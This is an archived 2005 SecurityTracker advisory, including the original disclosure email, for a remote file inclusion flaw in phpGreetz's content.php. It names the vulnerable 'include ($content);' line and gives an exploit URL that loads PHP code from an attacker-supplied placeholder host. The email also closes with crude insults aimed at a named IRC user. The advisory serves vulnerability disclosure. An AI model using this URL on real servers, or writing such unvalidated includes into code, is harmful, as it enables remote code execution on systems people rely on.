SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  phpGreetz Vendors:  phpgreetz.org
phpGreetz Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015276
SecurityTracker URL:  http://securitytracker.com/id?1015276
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 28 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.1a
Description:  beford and ][GB][ reported a vulnerability in phpGreetz. A remote user can execute arbitrary code on the target system.

The 'content.php' script does not properly validate user-supplied input in the 'content' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/path_to_phpgreetz/conten t.php?content=http://[attacker_url]
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.

This product is no longer under development.
Vendor URL:  sourceforge.net/projects/phpgreetz/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  gb.network@gmail.com
Message History:   None.

 Source Message Contents
Date:  Sat, 26 Nov 2005 22:26:13 +0000
From:  gb.network@gmail.com
Subject:  Remote file include in phpgreetz

 
Language: PHP
Script: phpgreetz
Version: 0.1a
Official website: http://sourceforge.net/projects/phpgreetz/
Problem: Remote file inclusion
Discovered by: beford & ][GB][
 
Description:
===========
Free greeting card website, being built and distributed as open source. 
Includes all functions and features to run a standalone site, including image uploading, 
user registration and profile management, mailing lists, image search engine, automatic thumb
 
Problem:
========
A remote user can include and execute arbitrary PHP code from the remote location.
The problem is in the file "content.php" at line 3:

include ($content);

 
Explotation example:
===================

http://[target]/path_to_phpgreetz/content.php?content=http://[attacker_url]

 
Solution:
========
 
Not solution at this time.
 
 
Greetz:
=======
 
uyx, beford, Zetha, lithyum,_|MALANDDO|_ ,desKrriado, |LINUX|, Amon-Ra, Extremo, SecretDreams, caffa
 
&& irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR ,,, irc.fullnetwork.org #full, #
f4kelive
   
irc.org.ve #uruguay, #venezuela
 
Fuckz:
=====
Morgan lamer and his irc.irc-argentina.org, his small ddos-botnet, its hidden in that server, the bot
s are
supposed to be argentinian users but noooo, he is using that ripped worm code i mentioned before!!!
he is such a leet h4x0r from santiago del estero (.ar)! hahahhaa


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC